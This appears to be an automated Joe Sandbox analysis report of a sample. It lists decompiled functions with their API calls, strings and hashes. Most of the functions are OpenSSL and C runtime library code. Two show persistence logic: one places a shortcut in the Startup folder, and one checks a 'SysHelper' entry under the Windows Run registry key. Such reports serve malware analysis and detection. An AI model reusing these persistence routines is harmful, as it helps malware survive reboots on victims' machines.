0x00463a90
0x00463a90
0x00463a98
0x00000000
0x00000000
0x00463a9a
0x00463a9a
0x00463a9b
0x00000000
0x00000000
0x00000000
0x00463a9b
0x00463a9d
0x00463aa5
0x00463aa8
0x00463aad
0x00000000
0x00463ab3
0x00463ab3
0x00000000
0x00463ab3
0x00463aad
0x00000000
0x00000000
0x00000000
0x004639ac
0x0046396c
0x00463955
0x00463950
0x00000000
0x004639b2
0x004639b7
0x004639b9
0x004639bc
0x004639bc
0x00000000
0x004638f9
0x004638ef
0x004638a8
0x004638a8
0x00000000
0x004638a8
0x00000000
0x00000000
0x00000000
0x0046383f
0x00463820
0x00463805
0x00000000
0x00463841
0x00463854
0x00463867
0x00463873
0x00463875
0x0046387f
0x00463881
0x00463884
0x00463884
0x00000000
0x004637cf
0x0046378c
0x0046378c
0x00463791
0x00463791
0x00463796
0x00463798
0x0046379a
0x0046379c
0x004637a1
0x00000000
0x004637a1
0x0046374a
0x0046374a
0x0046374f
0x00463754
0x00463710
0x00463710
0x00463712
0x00463714
0x00463719
0x00463719
0x0046371c
0x0046371d
0x00463726
0x0046372c
0x00463731
0x00463b98
0x00463b9a
0x00463ba1
0x00463ba2
0x00463ba4
0x00463bb2
0x00463bb2
0x00000000
0x00000000
0x00000000
0x004636e4
0x004636b4
0x00000000
0x004636e6
0x004636f4
0x004636f9
0x004636fc
0x004636fc
0x00000000
0x00463666
0x00463660
0x00000000

APIs

_strncmp.LIBCMT ref: 004636AA
_strncmp.LIBCMT ref: 004636DA
_strncmp.LIBCMT ref: 00463835
_strncmp.LIBCMT ref: 00463946
_strncmp.LIBCMT ref: 004639EA
_strncmp.LIBCMT ref: 00463A06
_strncmp.LIBCMT ref: 00463A27

Strings

.\crypto\pem\pem_lib.c, xrefs: 00463709, 0046374F, 00463791, 00463A69, 00463B02, 00463B62, 00463B85, 00463BDA
-----BEGIN , xrefs: 004636A4
-----, xrefs: 004636D4, 00463A21
, xrefs: 00463A90
-----END , xrefs: 0046382F, 00463940, 004639E4

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: _strncmp
String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
API String ID: 909875538-2733969777
Opcode ID: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
Opcode Fuzzy Hash: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B

Uniqueness

Uniqueness Score: -1.00%

Function 00425A97 Relevance: 19.6, APIs: 13, Instructions: 84
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E00425A97(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t15;
				intOrPtr _t22;
				intOrPtr* _t42;

				if(_a4 > 5 || _a8 == 0) {
					L4:
					return 0;
				} else {
					_t42 = E00428C96(8, 1);
					_t48 = _t42;
					if(_t42 != 0) {
						_t12 = E00428C96(0xb8, 1);
						 *_t42 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_t13 = E00428C96(0x220, 1);
							 *((intOrPtr*)(_t42 + 4)) = _t13;
							__eflags = _t13;
							if(_t13 != 0) {
								E004255AC( *_t42, 0x50aae8);
								_t15 = E00425E97(__ebx, __edx, 1, _t42,  *_t42, _a4, _a8);
								_push( *((intOrPtr*)(_t42 + 4)));
								__eflags = _t15;
								if(__eflags == 0) {
									L14:
									E00420BED();
									E0042453C( *_t42);
									E004243E2( *_t42);
									E00420BED(_t42);
									_t42 = 0;
									L16:
									return _t42;
								}
								_push( *((intOrPtr*)( *_t42 + 4)));
								_t22 = E00424BDD(__edx, 1, __eflags);
								__eflags = _t22;
								if(_t22 == 0) {
									 *((intOrPtr*)( *((intOrPtr*)(_t42 + 4)))) = 1;
									goto L16;
								}
								_push( *((intOrPtr*)(_t42 + 4)));
								goto L14;
							}
							E00420BED( *_t42);
							E00420BED(_t42);
							L8:
							goto L3;
						}
						E00420BED(_t42);
						goto L8;
					}
					L3:
					 *((intOrPtr*)(E00425208(_t48))) = 0xc;
					goto L4;
				}
			}

0x00425aa0
0x00425ac6
0x00000000
0x00425aa8
0x00425ab3
0x00425ab7
0x00425ab9
0x00425ad2
0x00425ad7
0x00425adb
0x00425add
0x00425aee
0x00425af3
0x00425af8
0x00425afa
0x00425b13
0x00425b20
0x00425b28
0x00425b2b
0x00425b2d
0x00425b42
0x00425b42
0x00425b49
0x00425b50
0x00425b56
0x00425b5e
0x00425b67
0x00000000
0x00425b67
0x00425b31
0x00425b34
0x00425b3b
0x00425b3d
0x00425b65
0x00000000
0x00425b65
0x00425b3f
0x00000000
0x00425b3f
0x00425afe
0x00425b04
0x00425ae5
0x00000000
0x00425ae5
0x00425ae0
0x00000000
0x00425ae0
0x00425abb
0x00425ac0
0x00000000
0x00425ac0

APIs

__calloc_crt.LIBCMT ref: 00425AAE

Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5

__calloc_crt.LIBCMT ref: 00425AD2
_free.LIBCMT ref: 00425AE0
__calloc_crt.LIBCMT ref: 00425AEE
_free.LIBCMT ref: 00425AFE
_free.LIBCMT ref: 00425B04
__copytlocinfo_nolock.LIBCMT ref: 00425B13
__wsetlocale_nolock.LIBCMT ref: 00425B20
__setmbcp_nolock.LIBCMT ref: 00425B34
_free.LIBCMT ref: 00425B42
___removelocaleref.LIBCMT ref: 00425B49
___freetlocinfo.LIBCMT ref: 00425B50
_free.LIBCMT ref: 00425B56

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
String ID:
API String ID: 1503006713-0
Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 00425B6E Relevance: 18.1, APIs: 12, Instructions: 131
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 84%

			E00425B6E(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12) {
				signed int _v8;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				void* _t38;
				signed int _t45;
				signed int _t60;
				intOrPtr _t77;
				void* _t80;
				intOrPtr* _t82;
				signed int _t83;
				signed int _t86;
				intOrPtr _t88;
				void* _t92;

				_t80 = __edx;
				_push(__ebx);
				_push(__esi);
				_t86 = 0;
				if(_a12 <= 0) {
					L5:
					return _t38;
				} else {
					_push(__edi);
					_t82 =  &_a12;
					while(1) {
						_t82 = _t82 + 4;
						_t38 = E004295C3(_a4, _a8,  *_t82);
						_t92 = _t92 + 0xc;
						if(_t38 != 0) {
							break;
						}
						_t86 = _t86 + 1;
						if(_t86 < _a12) {
							continue;
						} else {
							goto L5;
						}
						goto L20;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E004242FD(0, _t80);
					asm("int3");
					_push(0x14);
					_push(0x507ab0);
					E00428520(0, _t82, _t86);
					_t66 = 0;
					_v32 = 0;
					__eflags = _a4 - 5;
					if(__eflags <= 0) {
						_t88 = E00425007();
						_v36 = _t88;
						E004245DC(0, _t82, _t88, __eflags);
						 *(_t88 + 0x70) =  *(_t88 + 0x70) | 0x00000010;
						_v8 = _v8 & 0;
						_t83 = E00428C96(0xb8, 1);
						_v40 = _t83;
						__eflags = _t83;
						if(_t83 != 0) {
							E00428AF7(0xc);
							_v8 = 1;
							E004255AC(_t83,  *((intOrPtr*)(_t88 + 0x6c)));
							_v8 = _v8 & 0x00000000;
							E00425CE3();
							_t66 = E00425E97(0, _t80, _t83, _t88, _t83, _a4, _a8);
							_v32 = _t66;
							__eflags = _t66;
							if(_t66 == 0) {
								E0042453C(_t83);
								_t43 = E004243E2(_t83);
							} else {
								__eflags = _a8;
								if(_a8 != 0) {
									_t60 = E00437413(_a8, 0x50a97c);
									__eflags = _t60;
									if(_t60 != 0) {
										 *0x510434 = 1;
									}
								}
								E00428AF7(0xc);
								_v8 = 2;
								_t25 = _t88 + 0x6c; // 0x6c
								E0042465C(_t25, _t83);
								E0042453C(_t83);
								__eflags =  *(_t88 + 0x70) & 0x00000002;
								if(( *(_t88 + 0x70) & 0x00000002) == 0) {
									__eflags =  *0x50aba8 & 0x00000001;
									if(( *0x50aba8 & 0x00000001) == 0) {
										E0042465C(0x50aae4,  *((intOrPtr*)(_t88 + 0x6c)));
										_t77 =  *0x50aae4; // 0x50aae8
										_t32 = _t77 + 0x84; // 0x50b030
										 *0x50b028 =  *_t32;
										_t33 = _t77 + 0x90; // 0x4d0da8
										 *0x50b084 =  *_t33;
										_t34 = _t77 + 0x74; // 0x1
										 *0x50a978 =  *_t34;
									}
								}
								_v8 = _v8 & 0x00000000;
								_t43 = E00425CF2();
							}
						}
						_v8 = 0xfffffffe;
						E00425D25(_t43, _t88);
						_t45 = _t66;
					} else {
						 *((intOrPtr*)(E00425208(__eflags))) = 0x16;
						E004242D2();
						_t45 = 0;
					}
					return E00428565(_t45);
				}
				L20:
			}

0x00425b6e
0x00425b71
0x00425b74
0x00425b75
0x00425b7a
0x00425b9e
0x00425ba1
0x00425b7c
0x00425b7c
0x00425b7d
0x00425b80
0x00425b80
0x00425b8b
0x00425b90
0x00425b95
0x00000000
0x00000000
0x00425b97
0x00425b9b
0x00000000
0x00425b9d
0x00000000
0x00425b9d
0x00000000
0x00425b9b
0x00425ba2
0x00425ba3
0x00425ba4
0x00425ba5
0x00425ba6
0x00425ba7
0x00425bac
0x00425bad
0x00425baf
0x00425bb4
0x00425bb9
0x00425bbb
0x00425bbe
0x00425bc2
0x00425be0
0x00425be2
0x00425be5
0x00425bea
0x00425bee
0x00425bff
0x00425c01
0x00425c04
0x00425c06
0x00425c0e
0x00425c14
0x00425c1f
0x00425c26
0x00425c2a
0x00425c3e
0x00425c40
0x00425c43
0x00425c45
0x00425cfe
0x00425d04
0x00425c4b
0x00425c4b
0x00425c4f
0x00425c59
0x00425c60
0x00425c62
0x00425c64
0x00425c64
0x00425c62
0x00425c70
0x00425c76
0x00425c7d
0x00425c82
0x00425c88
0x00425c90
0x00425c94
0x00425c96
0x00425c9d
0x00425ca7
0x00425cae
0x00425cb4
0x00425cba
0x00425cbf
0x00425cc5
0x00425cca
0x00425ccd
0x00425ccd
0x00425c9d
0x00425cd2
0x00425cd6
0x00425cd6
0x00425c45
0x00425d0b
0x00425d12
0x00425d17
0x00425bc4
0x00425bc9
0x00425bcf
0x00425bd4
0x00425bd4
0x00425d1e
0x00425d1e
0x00000000

APIs

__invoke_watson.LIBCMT ref: 00425BA7
__calloc_crt.LIBCMT ref: 00425BF8
__lock.LIBCMT ref: 00425C0E
__copytlocinfo_nolock.LIBCMT ref: 00425C1F
__wsetlocale_nolock.LIBCMT ref: 00425C36
_wcscmp.LIBCMT ref: 00425C59
__lock.LIBCMT ref: 00425C70
__updatetlocinfoEx_nolock.LIBCMT ref: 00425C82
___removelocaleref.LIBCMT ref: 00425C88
__updatetlocinfoEx_nolock.LIBCMT ref: 00425CA7

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson__wsetlocale_nolock_wcscmp
String ID:
API String ID: 2762079118-0
Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
Instruction ID: 0fe30f67420a0b57e0336c9221d2143c2ac41a82f10de3dc78134a272e9def7d
Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
Instruction Fuzzy Hash: BE412932700724AFDB11AFA6B886B9E7BE0EF44318F90802FF51496282DB7D9544DB1D

Uniqueness

Uniqueness Score: -1.00%

Function 00411B90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110
stringcomCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00411B90(void* __ecx, WCHAR* __edx, void* _a4) {
				void* _v8;
				void* _v12;
				struct _ITEMIDLIST* _v16;
				char _v20;
				short _v532;
				char* _t30;
				intOrPtr* _t34;
				intOrPtr* _t35;
				intOrPtr* _t43;
				intOrPtr* _t48;
				intOrPtr* _t49;
				void* _t50;
				WCHAR* _t51;
				intOrPtr* _t54;
				intOrPtr* _t55;
				void* _t67;
				void* _t70;

				_t51 = __edx;
				_v8 = 0;
				_v12 = 0;
				__imp__CoInitialize(0, _t67, _t70, _t50);
				_t30 =  &_v8;
				__imp__CoCreateInstance(0x4ce908, 0, 1, 0x4cd568, _t30);
				__imp__CoUninitialize();
				if(_t30 >= 0) {
					_t34 = _v8;
					_t30 =  *((intOrPtr*)( *_t34))(_t34, 0x4cf2e8,  &_v12);
					if(_t30 >= 0) {
						_t35 = _v8;
						_t30 =  *((intOrPtr*)( *_t35 + 0x50))(_t35, __ecx);
						if(_t30 >= 0) {
							SHGetSpecialFolderLocation(_a4, 7,  &_v16);
							__imp__SHGetPathFromIDListW(_v16,  &_v532);
							lstrcatW( &_v532, "\\");
							lstrcatW( &_v532, _t51);
							_t43 = _v12;
							_t30 =  *((intOrPtr*)( *_t43 + 0x18))(_t43,  &_v532, 1);
							if(_t30 >= 0) {
								GetSystemDirectoryW( &_v532, 0x100);
								lstrcatW( &_v532, L"\\shell32.dll");
								_t48 = _v8;
								_t30 =  *((intOrPtr*)( *_t48 + 0x44))(_t48,  &_v532, 1);
								if(_t30 >= 0) {
									_t49 = _v8;
									_t30 =  *((intOrPtr*)( *_t49 + 0x40))(_t49,  &_v532, 0x100,  &_v20);
								}
							}
						}
					}
				}
				_t54 = _v12;
				if(_t54 != 0) {
					_t30 =  *((intOrPtr*)( *_t54 + 8))(_t54);
				}
				_t55 = _v8;
				if(_t55 == 0) {
					return _t30;
				} else {
					return  *((intOrPtr*)( *_t55 + 8))(_t55);
				}
			}

0x00411b9e
0x00411ba0
0x00411ba9
0x00411bb0
0x00411bb6
0x00411bc8
0x00411bd0
0x00411bd8
0x00411bde
0x00411bed
0x00411bf1
0x00411bf7
0x00411bfe
0x00411c03
0x00411c12
0x00411c22
0x00411c3a
0x00411c44
0x00411c46
0x00411c55
0x00411c5a
0x00411c68
0x00411c7a
0x00411c7c
0x00411c8b
0x00411c90
0x00411c92
0x00411ca8
0x00411ca8
0x00411c90
0x00411c5a
0x00411c03
0x00411bf1
0x00411cab
0x00411cb3
0x00411cb8
0x00411cb8
0x00411cbb
0x00411cc0
0x00411ccb
0x00411cc2
0x00000000
0x00411cc5

APIs

CoInitialize.OLE32(00000000), ref: 00411BB0
CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
CoUninitialize.OLE32 ref: 00411BD0
SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
lstrcatW.KERNEL32(?), ref: 00411C44
GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A

Strings

\shell32.dll, xrefs: 00411C6E

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
String ID: \shell32.dll
API String ID: 679253221-3783449302
Opcode ID: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
Instruction ID: 1ac700bd2dba931ae0f93f3cd35093afe8c3aec66b03df765643047a9f16b657
Opcode Fuzzy Hash: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
Instruction Fuzzy Hash: 1D415E70A40209AFDB10CBA4DC88FEA7B7CEF44705F104499F609D7160D6B4AA45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004549A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 77%

			E004549A0(void* __ebx) {
				signed int _v8;
				long _v12;
				void* _v16;
				void* _v24;
				void* __edi;
				void* __esi;
				signed int _t21;
				CHAR* _t23;
				void* _t31;
				unsigned int _t34;
				struct HINSTANCE__* _t42;
				void* _t43;
				void* _t52;
				void* _t54;
				void* _t55;
				long _t56;
				signed int _t58;
				void* _t59;

				_t43 = __ebx;
				E0042F7C0(0xc);
				_t21 =  *0x50ad20; // 0x84f4da2
				_v8 = _t21 ^ _t58;
				_t23 =  *0x512a94;
				if(_t23 != 0) {
					L12:
					if(_t23 == 0xffffffff) {
						goto L6;
					} else {
						 *_t23();
						return E0042A77E(_t43, _v8 ^ _t58, _t52, _t54, _t56);
					}
				} else {
					_t42 = GetModuleHandleA(_t23);
					if(_t42 == 0) {
						_t23 =  *0x512a94;
					} else {
						_t23 = GetProcAddress(_t42, "_OPENSSL_isservice");
						 *0x512a94 = _t23;
					}
					if(_t23 != 0) {
						goto L12;
					} else {
						 *0x512a94 = 0xffffffff;
						L6:
						GetDesktopWindow();
						_t55 = GetProcessWindowStation();
						if(_t55 == 0 || GetUserObjectInformationW(_t55, 2, 0, 0,  &_v12) != 0 || GetLastError() != 0x7a) {
							L14:
							return E0042A77E(_t43, _v8 ^ _t58, _t52, _t55, _t56);
						} else {
							_t56 = _v12;
							if(_t56 > 0x200) {
								goto L14;
							} else {
								_t56 = _t56 + 0x00000001 & 0xfffffffe;
								E0043F980(_t56 + 2, _t56);
								_t31 = _t59;
								_v16 = _t31;
								if(GetUserObjectInformationW(_t55, 2, _t31, _t56,  &_v12) == 0) {
									goto L14;
								} else {
									_t47 = _v16;
									_t34 = _v12 + 0x00000001 & 0xfffffffe;
									_v12 = _t34;
									_push(L"Service-0x");
									 *((short*)(_v16 + (_t34 >> 1) * 2)) = 0;
									E00421C02(_v16);
									asm("sbb eax, eax");
									return E0042A77E(_t43, _v8 ^ _t58, 0, _t55, _t56, _t47);
								}
							}
						}
					}
				}
			}

0x004549a0
0x004549a8
0x004549ad
0x004549b4
0x004549b7
0x004549c0
0x00454aab
0x00454aae
0x00000000
0x00454ab4
0x00454ab4
0x00454ac8
0x00454ac8
0x004549c6
0x004549c7
0x004549cf
0x004549e4
0x004549d1
0x004549d7
0x004549dd
0x004549dd
0x004549eb
0x00000000
0x004549f1
0x004549f1
0x004549fb
0x004549fb
0x00454a07
0x00454a0b
0x00454ac9
0x00454ade
0x00454a39
0x00454a39
0x00454a42
0x00000000
0x00454a48
0x00454a49
0x00454a52
0x00454a57
0x00454a62
0x00454a6d
0x00000000
0x00454a6f
0x00454a74
0x00454a78
0x00454a7b
0x00454a80
0x00454a86
0x00454a8a
0x00454a94
0x00454aaa
0x00454aaa
0x00454a6d
0x00454a42
0x00454a0b
0x004549eb

APIs

GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
GetDesktopWindow.USER32 ref: 004549FB
GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
_wcsstr.LIBCMT ref: 00454A8A

Strings

_OPENSSL_isservice, xrefs: 004549D1
Service-0x, xrefs: 00454A80

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
String ID: Service-0x$_OPENSSL_isservice
API String ID: 2112994598-1672312481
Opcode ID: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
Opcode Fuzzy Hash: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58

Uniqueness

Uniqueness Score: -1.00%

Function 00454AE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75
registrywindowCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E00454AE0(void* __ebx, void* __edx, void* __edi, void* __esi, char _a4, char _a259, signed int _a260, wchar_t* _a268, void _a272) {
				CHAR* _v0;
				signed int _t17;
				void* _t19;
				void* _t46;
				void* _t49;
				void* _t50;
				signed int _t51;
				signed int _t52;

				_t48 = __esi;
				_t47 = __edi;
				_t46 = __edx;
				_t39 = __ebx;
				E0042F7C0(0x108);
				_t17 =  *0x50ad20; // 0x84f4da2
				_a260 = _t17 ^ _t51;
				_t19 = GetStdHandle(0xfffffff4);
				if(_t19 == 0 || GetFileType(_t19) == 0) {
					vswprintf( &_a4, 0xff, _a268,  &_a272);
					_t52 = _t51 + 0x10;
					_a259 = 0;
					if(E004549A0(_t39) <= 0) {
						MessageBoxA(0,  &_a4, "OpenSSL: FATAL", 0x10);
						return E0042A77E(_t39, _a260 ^ _t52, _t46, _t47, _t48);
					} else {
						_t49 = RegisterEventSourceA(0, "OPENSSL");
						_v0 =  &_a4;
						ReportEventA(_t49, 1, 0, 0, 0, 1, 0,  &_v0, 0);
						DeregisterEventSource(_t49);
						_t50 = _t48;
						return E0042A77E(_t39, _a260 ^ _t52, _t46, _t47, _t50);
					}
				} else {
					E0042BDCC(E00420E4D() + 0x40, _a268,  &_a272);
					return E0042A77E(__ebx, _a260 ^ _t51 + 0x0000000c, _t46, __edi, __esi);
				}
			}

0x00454ae0
0x00454ae0
0x00454ae0
0x00454ae0
0x00454ae5
0x00454aea
0x00454af1
0x00454afa
0x00454b02
0x00454b5d
0x00454b62
0x00454b65
0x00454b74
0x00454bd3
0x00454bed
0x00454b76
0x00454b86
0x00454b8c
0x00454ba2
0x00454ba9
0x00454baf
0x00454bc4
0x00454bc4
0x00454b0f
0x00454b27
0x00454b43
0x00454b43

APIs

GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
GetFileType.KERNEL32(00000000,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454B05
__vfwprintf_p.LIBCMT ref: 00454B27

Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF

vswprintf.LIBCMT ref: 00454B5D
RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
MessageBoxA.USER32 ref: 00454BD3

Strings

OPENSSL, xrefs: 00454B77
OpenSSL: FATAL, xrefs: 00454BC7

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
String ID: OPENSSL$OpenSSL: FATAL
API String ID: 277090408-1348657634
Opcode ID: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
Opcode Fuzzy Hash: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B

Uniqueness

Uniqueness Score: -1.00%

Function 00412360 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00412360() {
				void* _v8;
				int _v12;
				int _v16;
				int _v20;
				char _v2066;
				short _v2068;
				short _v4116;
				signed int _t35;

				E0042F7C0(0x1010);
				_v8 = 0;
				if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0xf003f,  &_v8) == 0) {
					_v12 = 1;
					_v2068 = 0;
					E0042B420( &_v2066, 0, 0x7fe);
					_v20 = 0x400;
					RegQueryValueExW(_v8, L"SysHelper", 0,  &_v12,  &_v2068,  &_v20);
					RegCloseKey(_v8);
					_v16 = 0;
					lstrcpyW( &_v4116,  *(CommandLineToArgvW(GetCommandLineW(),  &_v16)));
					_t35 = lstrcmpW( &_v4116,  &_v2068);
					asm("sbb eax, eax");
					return  ~_t35 + 1;
				} else {
					return 0;
				}
			}

0x00412368
0x00412370
0x00412391
0x0041239b
0x004123a8
0x004123b6
0x004123be
0x004123de
0x004123e7
0x004123ed
0x0041240e
0x00412422
0x0041242a
0x00412430
0x00412393
0x00412398
0x00412398

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
_memset.LIBCMT ref: 004123B6
RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
RegCloseKey.ADVAPI32(?), ref: 004123E7
GetCommandLineW.KERNEL32 ref: 004123F4
CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
lstrcpyW.KERNEL32 ref: 0041240E
lstrcmpW.KERNEL32(?,?), ref: 00412422

Strings

SysHelper, xrefs: 004123D6
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
API String ID: 122392481-4165002228
Opcode ID: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
Opcode Fuzzy Hash: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94

Uniqueness

Uniqueness Score: -1.00%
